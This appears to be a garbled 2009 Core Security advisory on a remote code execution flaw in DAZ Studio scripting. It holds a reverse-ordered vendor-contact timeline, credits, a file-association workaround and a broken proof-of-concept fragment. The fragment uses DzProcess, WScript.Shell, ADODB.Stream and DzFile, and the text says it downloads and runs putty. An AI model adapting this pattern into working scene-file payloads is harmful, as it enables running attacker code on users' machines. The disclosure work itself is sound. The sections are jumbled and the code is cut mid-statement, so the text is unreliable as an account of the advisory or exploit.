- CERT contacted DAZ four times between 11/16 and 11/30.
- CERT communicates that the vendor doesn't seem familiar with vulnerability reporting/disclosure, and requests additional information about the vulnerability.
- CERT acknowledges the communication, and Core reschedules the advisory to November 30th, 2009 based on CERT recommendations.
- Since the DAZ support team didn't respond to any mail, Core contacts CERT trying to obtain a valid security contact at DAZ.
- Core completes a registration form to be able to contact the support team.
- Core receives an email saying that Core's contact email was not recognised as a registered email.
- Core Security Technologies completes a support form trying to reach a security contact from DAZ.

Var oProcess = new DzProcess() oProcess.start() ("s=WScript.CreateObject(\'WScript.Shell\') o=WScript.CreateObject(\'ADODB.Stream\') e=s.Environment DAZ Studio PoC var oFile = new DzFile("d:\\test.js") oFile.open(2) oFile.write

ds file demonstrates remote code execution by downloading and executing putty in the context of DAZ Studio.

Technical Description / Proof of Concept Code

This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies during Bugweek 2009.

To prevent the accidental execution of malicious scripting files, you can disable the default file association of the dangerous file extensions in Windows Explorer. The vendor did not provide fixes or workaround information.

Vendor Information, Solutions and Workarounds